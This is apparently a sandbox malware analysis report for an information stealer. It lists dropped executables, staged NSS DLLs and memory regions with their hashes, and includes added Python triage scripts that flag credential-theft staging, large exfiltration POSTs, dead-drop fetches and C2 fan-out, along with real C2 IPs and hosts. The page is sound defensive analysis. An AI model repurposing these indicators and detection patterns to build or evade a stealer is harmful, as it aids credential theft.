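    records = []
    for chunk in re.split(r"^\s*•\s*", text, flags=re.M)[1:]:
        lines = [l.strip() for l in chunk.splitlines() if l.strip()]
        endpoint, name, proto = lines[:3]
        i, process = 3, None
        if not SIZE_RE.match(lines[i]):          # a process name, not a byte count
            process, i = lines[i], i + 1
        tx, rx = parse_size(lines[i]), parse_size(lines[i + 1])
        rest = lines[i + 4:]                     # skip the two packet counters
        reqs = [rest[j + 1] for j in range(len(rest) - 1) if rest[j] == "HTTP Request"]
        records.append(dict(endpoint=endpoint, name=name, proto=proto,
                            process=process, tx=tx, rx=rx, requests=reqs))
    return records

def triage(records, post_threshold=50_000, dll_min=2, fanout_min=3):
    """Assumed thresholds: >=dll_min NSS DLLs from one host, >=post_threshold
    bytes sent in one POST connection, >=fanout_min distinct /api hosts."""
    findings, dll_by, api_by = [], {}, {}
    for r in records:
        for req in r["requests"]:
            method, url = req.split(" ", 1)
            host, fname = url.split("/")[2], url.rsplit("/", 1)[-1].lower()
            if method == "GET" and fname in NSS_DLLS:
                dll_by.setdefault((r["process"], host), set()).add(fname)
            if method == "POST" and r["tx"] >= post_threshold:
                findings.append(("large-post", r["process"], url, r["tx"]))
            if method == "GET" and any(d in url for d in DEAD_DROPS):
                findings.append(("dead-drop", r["process"], url))
            if method == "POST" and url.endswith("/api"):
                api_by.setdefault(r["process"], set()).add(host)
    for (proc, host), names in dll_by.items():
        if len(names) >= dll_min:
            findings.append(("nss-staging", proc, host, sorted(names)))
    for proc, hosts in api_by.items():
        if len(hosts) >= fanout_min:
            findings.append(("c2-fanout", proc, sorted(hosts)))
    return findings
```

Run over the excerpt, `triage(parse_records(SAMPLE))` reports the DLL staging from 116.202.0.195, the 125.8 kB POST to the same host (the only upload-heavy request in the capture, consistent with the stealer sending its collected data) and the Steam profile fetch by RegAsm.exe, a process that has no business loading Steam pages. Fed the full list, the nine POSTs to the `*.shop/api` hosts from the Lumma configuration trip the `c2-fanout` rule as well. The checks key on behaviour rather than on the specific IPs and domains, which rotate between campaigns.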
MITRE ATT&CK Enterprise v15

Downloads

  • C:\ProgramData\CGDGCFBAEG.exe

    Filesize

    354KB

    MD5

    384a847ad2833788fa253433fd2eea8d

    SHA1

    1984d8788fe40bd95a90d7d4e9dea6c4e4ff6201

    SHA256

    de30491736617249b3e80fc9436ecf0f7675b3c3014509398c3db7298f93336a

    SHA512

    bcdbd44837629d8881c29a7c7f6a2d4e98b52fbc49952bad2c89340a1dee18fac9987aaa8a3d91905a1f88a216c0e2501201a8665f3df7d5f627ff71a2418aac

  • C:\ProgramData\IIEBAFCBKF.exe

    Filesize

    292KB

    MD5

    4a8a0ccfecc930091116324c79c1006e

    SHA1

    d790befcbc31a4befafeaf08879e15f99633b2a1

    SHA256

    146b7006b041d25b6846c797234f38387ec4b141c4a7e4f100d0e6d2eda29088

    SHA512

    ffef04766c2a9f9d038ccf6156ac7f03a0e0809adaf245a1347e5ece6ad31f9b37f283d71d34c031350456f30036078d5a3e97fa563bf6af6a8fcf6edeeb25d2

  • C:\ProgramData\KJEHJKJEBGHJ\CBFBKF

    Filesize

    160KB

    MD5

    f310cf1ff562ae14449e0167a3e1fe46

    SHA1

    85c58afa9049467031c6c2b17f5c12ca73bb2788

    SHA256

    e187946249cd390a3c1cf5d4e3b0d8f554f9acdc416bf4e7111fff217bb08855

    SHA512

    1196371de08c964268c44103ccaed530bda6a145df98e0f480d8ee5ad58cb6fb33ca4c9195a52181fe864726dcf52e6a7a466d693af0cda43400a3a7ef125fad

  • C:\ProgramData\mozglue.dll

    Filesize

    593KB

    MD5

    c8fd9be83bc728cc04beffafc2907fe9

    SHA1

    95ab9f701e0024cedfbd312bcfe4e726744c4f2e

    SHA256

    ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

    SHA512

    fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

  • C:\ProgramData\nss3.dll

    Filesize

    2.0MB

    MD5

    1cc453cdf74f31e4d913ff9c10acdde2

    SHA1

    6e85eae544d6e965f15fa5c39700fa7202f3aafe

    SHA256

    ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

    SHA512

    dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE

    Filesize

    2KB

    MD5

    4c4bf9e4d624f1045d8f73ed7f97dc3e

    SHA1

    1d78800f4a780fc6f75a778faeed2baaf84f2206

    SHA256

    6dcfee83067db655225002d6ee68c1948d82de8a4b488355fbdee6fce73638db

    SHA512

    4c950580ec4fb088382f066948964846bbee5d575eac1f70253e5adc3c09f071d398c1b6eb42fb2a00e017ba2a344ef6709c6f321a5b38db8bd39933989494bb

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

    Filesize

    2KB

    MD5

    7ec05ad5ad4ea2f59d78a181b608dfb1

    SHA1

    95dfcb1ca8c7c6353bfc940c79f877d491158faa

    SHA256

    197a38efa533f9ff60b730cbc9b5fb604893e8dfb08a9ba85f0e5424779e3759

    SHA512

    da07b1ce6b278f20a93cfb83107be1a96bd134657be71f31b314e981ae9f85a8db50ae10458612bd460baca5e9402d5bce61b11ed648b191be42882273b8c00a

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

    Filesize

    1KB

    MD5

    9ea353ed4fed6ed641da2a1a1e66cbf3

    SHA1

    42cf55d3608819795042c23df5f18fcd2b6b0c58

    SHA256

    5245794a9cb70971f00a51f56b8b5305d16629c4d0d0e95916371a20a6119485

    SHA512

    7476acf575e998c56bae27703d635c82a5cfd43f736b9618ec430168148f25d79c97ca344670298b51956ca0b3707d6499ef5865fe1b933acb948dddc822d05e

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE

    Filesize

    458B

    MD5

    27a8dae1ee49481f98bf4bfdd39ed2c9

    SHA1

    45db0a1cc3ce7205854e411c8f07cba40980d2d7

    SHA256

    8430147602ca2587591250a4be4471d9245f7cfcaef796f9debbfaaf559a8c44

    SHA512

    a234db5b908c4b98db8a780d68c8c3a539f257167134d61ab9fec6f140de12202795a8797186642c5ee189a77e9c533b1582eae453e208400945c519acb6c981

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\223DE96EE265046957A660ED7C9DD9E7_EFF9B9BA98DEAA773F261FA85A0B1771

    Filesize

    450B

    MD5

    58947f5f7670cc12149ea68fb75d8364

    SHA1

    6b7b42eb243ecf6697417f63f7d12a27b08709da

    SHA256

    873fb435bf386720b30ba5d9da65350e15a8a208beab2b5bbd2e5f1fe8b00450

    SHA512

    b86355477b2a6fdf5854ba56396745d7128b7a291d6028b905d4ee9e3388d72c633ab7f02fdd84e1f92d6c16d3c57462515c57cb25f0850092c8cee9a4eb660c

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\EB2C4AB8B68FFA4B7733A9139239A396_D76DB901EE986B889F30D8CC06229E2D

    Filesize

    458B

    MD5

    289ee092606d772e91be51ed30232610

    SHA1

    7d8db09f4b22fd58a5ed87059517af8caca659c7

    SHA256

    04de857b03408b5ca62653c45df2aa17cc07a80cbc4a2b5b22966a2519460ca0

    SHA512

    5ccd81d8895b519f228684bb608c5749aba0ed8ce8333c2500050f534f81460236127b591a2521df32f9581379b2680348512b7d9214bc84d04303608235e091

  • memory/312-27-0x0000000022910000-0x0000000022B6F000-memory.dmp

    Filesize

    2.4MB

  • memory/312-85-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-59-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-60-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-42-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-43-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-84-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-25-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-92-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-93-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-26-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-4-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-9-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/312-11-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/2212-107-0x00000000725AE000-0x00000000725AF000-memory.dmp

    Filesize

    4KB

  • memory/2212-116-0x00000000725A0000-0x0000000072D50000-memory.dmp

    Filesize

    7.7MB

  • memory/2212-109-0x00000000725A0000-0x0000000072D50000-memory.dmp

    Filesize

    7.7MB

  • memory/2212-108-0x0000000000A30000-0x0000000000A8A000-memory.dmp

    Filesize

    360KB

  • memory/2892-147-0x0000000020110000-0x000000002036F000-memory.dmp

    Filesize

    2.4MB

  • memory/2892-146-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/2892-161-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/2892-145-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/2892-162-0x0000000000400000-0x0000000000657000-memory.dmp

    Filesize

    2.3MB

  • memory/3084-6-0x0000000075000000-0x00000000757B0000-memory.dmp

    Filesize

    7.7MB

  • memory/3084-2-0x0000000075000000-0x00000000757B0000-memory.dmp

    Filesize

    7.7MB

  • memory/3084-7-0x0000000075000000-0x00000000757B0000-memory.dmp

    Filesize

    7.7MB

  • memory/3084-1-0x0000000000780000-0x00000000007CA000-memory.dmp

    Filesize

    296KB

  • memory/3084-0-0x000000007500E000-0x000000007500F000-memory.dmp

    Filesize

    4KB

  • memory/3908-117-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/3908-114-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

  • memory/3908-111-0x0000000000400000-0x000000000045D000-memory.dmp

    Filesize

    372KB

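Two things in the Downloads list above are easy to miss when reading hashes by eye: C:\ProgramData\IIEBAFCBKF.exe carries the same MD5/SHA1/SHA256 as the submitted file.exe, so the sample copied itself into ProgramData under a random name, and the CryptnetUrlCache entries are Windows' own cache of CRL/OCSP/AIA fetches rather than malware output. The script below is an added example written for this page, not part of the report; it parses the list's label/value layout and applies a small classification that is the author's own (the category names, the NSS DLL set and the "self-copy" check against the submitted sample's SHA256 are assumptions). The sample input is an excerpt of the report's own entries with SHA512 lines omitted.

```python
import re

# Excerpt of the report's Downloads list (copied from the page above; blank
# lines and SHA512 values dropped for brevity). Raw string: paths keep their backslashes.
SAMPLE = r"""
• C:\ProgramData\CGDGCFBAEG.exe
  Filesize
  354KB
  MD5
  384a847ad2833788fa253433fd2eea8d
  SHA1
  1984d8788fe40bd95a90d7d4e9dea6c4e4ff6201
  SHA256
  de30491736617249b3e80fc9436ecf0f7675b3c3014509398c3db7298f93336a
• C:\ProgramData\IIEBAFCBKF.exe
  Filesize
  292KB
  MD5
  4a8a0ccfecc930091116324c79c1006e
  SHA1
  d790befcbc31a4befafeaf08879e15f99633b2a1
  SHA256
  146b7006b041d25b6846c797234f38387ec4b141c4a7e4f100d0e6d2eda29088
• C:\ProgramData\mozglue.dll
  Filesize
  593KB
  MD5
  c8fd9be83bc728cc04beffafc2907fe9
  SHA1
  95ab9f701e0024cedfbd312bcfe4e726744c4f2e
  SHA256
  ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a
• C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\156887258BBD6E1FEF562837733EA04E_5BBC02CEDFD3F7AC9E268D830CF231EE
  Filesize
  2KB
  MD5
  4c4bf9e4d624f1045d8f73ed7f97dc3e
  SHA1
  1d78800f4a780fc6f75a778faeed2baaf84f2206
  SHA256
  6dcfee83067db655225002d6ee68c1948d82de8a4b488355fbdee6fce73638db
"""

# SHA256 of the submitted file.exe as listed in the report.
SUBMITTED_SHA256 = "146b7006b041d25b6846c797234f38387ec4b141c4a7e4f100d0e6d2eda29088"
# DLLs fetched from the C2 host in the network section; assumed set, see above.
NSS_DLLS = {"nss3.dll", "freebl3.dll", "softokn3.dll", "mozglue.dll",
            "sqlp.dll", "msvcp140.dll", "vcruntime140.dll"}

def parse_artifacts(text):
    """One dict per bullet: 'path' plus the label/value pairs that follow it."""
    arts = []
    for chunk in re.split(r"^\s*•\s*", text, flags=re.M)[1:]:
        lines = [l.strip() for l in chunk.splitlines() if l.strip()]
        art = {"path": lines[0]}
        art.update(zip(lines[1::2], lines[2::2]))
        arts.append(art)
    return arts

def classify(artifacts, submitted_sha256=SUBMITTED_SHA256):
    """Map each path to a triage label (labels are this example's, not the report's)."""
    labels = {}
    for a in artifacts:
        path = a["path"]
        fname = path.rsplit("\\", 1)[-1].lower()
        if a["SHA256"].lower() == submitted_sha256.lower():
            labels[path] = "self-copy"      # same bytes as the submitted sample
        elif "\\cryptneturlcache\\" in path.lower():
            labels[path] = "capi-cache"     # Windows CRL/OCSP/AIA cache, benign on its own
        elif fname in NSS_DLLS:
            labels[path] = "nss-staged"     # matches the DLLs pulled from the C2 host
        elif fname.endswith(".exe"):
            labels[path] = "dropped-pe"     # second-stage payload written to disk
        else:
            labels[path] = "unclassified"
    return labels

def hashes_to_block(artifacts, labels):
    """SHA256 values worth blocking: everything except the OS cache files."""
    return sorted(a["SHA256"].lower() for a in artifacts
                  if labels[a["path"]] != "capi-cache")
```

`classify(parse_artifacts(SAMPLE))` labels IIEBAFCBKF.exe as the self-copy, CGDGCFBAEG.exe as a dropped executable, mozglue.dll as one of the staged NSS libraries and the CryptnetUrlCache file as OS cache. Blocking on the self-copy hash adds nothing over blocking the submitted sample, so `hashes_to_block` dedupes by value; the CGDGCFBAEG.exe hash and the NSS DLL hashes are the useful new indicators, with the caveat that the NSS DLLs are legitimate Mozilla binaries and should be matched on path (C:\ProgramData) rather than on hash alone.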